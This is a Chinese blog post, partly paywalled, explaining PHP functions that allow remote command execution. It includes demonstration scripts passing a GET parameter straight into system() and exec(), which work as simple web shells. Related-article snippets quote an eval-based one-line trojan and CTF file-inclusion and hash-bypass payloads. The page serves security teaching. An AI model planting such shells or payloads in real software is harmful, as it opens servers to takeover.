后台代码-PHP危险函数

最新推荐文章于 2024-04-16 20:35:04 发布
最新推荐文章于 2024-04-16 20:35:04 发布
阅读量901 收藏 3
点赞数 1
文章标签: 字符串 php shell 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chenamao/article/details/107924944
版权

目录

后台代码-PHP危险函数

1.OS命令执行函数

*PHP代码执行函数

*回调函数

*动态函数 $a($b)

扩展知识:

OS命令注入漏洞

PHP代码注入

后台代码-PHP危险函数

RCE,(Remote Code\Command Execute)

 

1.OS命令执行函数

函数会调用系统命令,类似于 bash或者cmd,PHP会自动区分平台。

☺  系统命令函数,调用的是服务器命令。

☺  PHP解释器会自动识别系统平台

☺  如果参数可控,就相当于shell

☺  在浏览器输入命令,在服务器端执行

 通过Web方式传参调用系统命令,无法切换工作目录,非持久性链接,对比反弹shell.

System()

System() 自带输出功能 ,将字符串作为OS命令执行。

例:php脚本验证

<meta charset='gb2312'>

<?php

if(isset($_GET['cmd'])){

echo "<pre>";

system($_GET['cmd']);

}else{

echo"

?cmd=ipconfig

";

}

?>

验证结果:

注:在Web页面执行命令时,不能切换命令。

exec()

exec  将字符串作为OS命令执行。

      不支持命令中有空格

不带输出功能 ,需要利用print,

*输出不完整。

例:php脚本验证

<meta charset="gb2312">

<?php

if(isset($_GET['cmd'])){

echo "<pre>";

print exec($_GET['cmd']);

}else{

echo"

?cmd=whoami

";

}

?>

验证:

最低0.47元/天 解锁文章
Chenamao
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP技巧:php过滤危险html代码
phphot
03-18 1605
PHP过滤html里可能被利用来引入外部危险内容的代码。有些时候,需要让用户提交html内容,以便丰富用户发布的信息,当然,有些可能造成显示页面布局混乱的代码也在过滤范围内。以下是引用片段:#用户发布的html,过滤危险代码function uh($str){    $farr = array(        "//s+/",                                   
PHP危险函数
杨同学的博客
12-23 511
php部分危险函数
有回显代码执行-无字母数字RCE进阶PHP5
最新发布
asdfaa的博客
04-16 786
可以执行,符合正则匹配,但无法获取flag值;
php危险字符,PHP代码审计(常见的危险函数)
weixin_39526185的博客
03-12 103
PHP代码审计(常见的危险函数)(2016-12-26 12:10:41)分类:PHPeval 将字符串php代码执行assert 断言(可以代替eval来执行字符串)preg_replace 正则表达式替换用/e修饰会执行代码create_function(参数,代码)创建一个匿名函数()$abb='syst'.'em'用字符串拼接产生函数call_user_fuc回调函数require,in...
后台常用工具函数(会持续更新)
weixin_34419326的博客
08-17 82
获取随机字符串 /** * 获取随机字符串 * * @param number $length * @return string */ function createNonceStr($length = 16) { $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; ...
CTFshow web入门——文件包含
小元砸的博客
02-07 3282
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
php代码-PHP匿名函数
07-16
php代码-PHP匿名函数
php代码-PHP函数的嵌套
07-16
php代码-PHP函数的嵌套
py代码-函数函数函数函数
07-16
py代码-函数函数函数函数
【渗透测试】文件上传漏洞
ssrf
08-01 975
一、任意文件上传 靶场DVWA 安全级别:低 上传php文件 <?php @eval($_POST['caidao']);?> // 一句话木马 查看后端源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $targe
CTFSHOW 红包题第二弹
Firebasky的博客
08-12 2744
直接上题目 <?php if(isset($_GET['cmd'])){ $cmd=$_GET['cmd']; highlight_file(__FILE__); if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){ die("cerror"); } if(preg_ma
PHP—MD5和sha1绕过
cosmoslin的博客
10-26 6825
1 数组绕过 对于php强比较和弱比较:md5(),sha1()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 <?php $a=$_GET['a']; $b=$_GET['b']; if ($a!==$b && md5($a)===md5($b)){ return "hahaha"; } 使用: ?a[]=1&b[]=2 2 0e绕过弱比较 对于某些特殊的字符串加密后得到的密文以0e开头,PHP会当作科
反弹shell以及常见的反弹Shell语句原理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-31 475
什么是反弹shell?原词为reverse shell,含义如下 控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。 其本质就是实现客户端与服务端的互换 反弹shell利用原因 初学时我们不禁有这样的疑问,为什么我们要用反弹shell呢?我们时候利用反弹shell呢?解释如下 为什么要用反弹shell 这里不以CTF举例,以相对更真实一点的渗透过程来举例,比如你作为攻击方,成功向目标处上传了木马文件,可以执行一些语句,我们想获取一个可以直接操作主机的虚拟终端,这个时
代码审计-php命令执行
小刚的博客
07-27 618
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 php命令执行前言返回执行结果无返回执行结果命令执行小技巧1.在命令执行过程中,我们会遇到空格被删除或者替换的情况2.在命令执行过程中,我们会进行多条命令执行防范措施 前言 近期在学习php代码审计,推一下这本书啊代码审计 企业级Web代码安全架构_尹毅著。 前篇文章介绍过代码执行了,现在写写命令执行。 命令执行就是执行命令,执行win和Linux的系统命令 php中有好几个可以执行系统命令的.
常见的 PHP 危险函数
认真走好每一小步
07-19 655
代码执行函数、命令执行函数
PHP中的16个危险函数
滴水石穿
08-14 811
php中内置了许许多多的函数,在它们的帮助下可以使我们更加快速的进行开发和维护,但是这个函数中依然有许多的函数伴有高风险的,比如说一下的16个函数不到万不得已不尽量不要使用,因为许多“高手”可以通过这些函数抓取你的漏洞。功能描述:可通过 popen() 的参数传递一条命令,并对 popen() 所打开的文件进行执行。功能描述:是 ini_set() 函数的一个别名函数,功能与 ini_set() 相同。功能描述:允许执行一个外部程序并回显输出,类似于 passthru()。具体参见 ini_set()。
面试过程遇到得问题
jachinFang的博客
06-23 176
http://localhost/a.php?a=1!2&b=3#4&c=5$6&d=7@8 <?php $a=$_GET['a']; var_dump($a); echo "<br/>"; $b=$_GET['b']; var_dump($b); echo "<br/>"; $c=$_GET['c']; var_dump($c); echo "<br/>"; $d=$_GET['d']; var_dump($d); 输出结果
php提交表单时判断 if($_POST[submit])与 if(isset($_POST[submit])) 的区别
dazhi_100的专栏
05-24 5151
if(isset($_POST['submit'])) 它的意思是不是判断是否配置了$_POST['submit'] 这个变量呢?如果有这个变量 在执行其它代码  应该这样用if(isset($_POST['submit'])){  }  提交表单时 if($_POST[submit])与 if(isset($_POST[submit]))的区别  第一种方法会出现一个warnin
h-swish 激活函数matlab代码
08-05
对于h-swish激活函数的Matlab代码,以下是一个示例实现: ```matlabfunction output = h_swish(input) output = input .* max(0, min(1, input +3)) ./6; end``` 这是一个简单的函数,将输入元素与0和1之间的值相乘,同时限制输入的范围在-3和3之间,最后除以6。这个函数实现了h-swish激活函数的逼近,以便在轻量级网络中使用,并减少计算量。你可以将输入作为参数传递给函数,并得到相应的输出。 请注意,这只是一个简单的示例实现,你可以根据需要进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值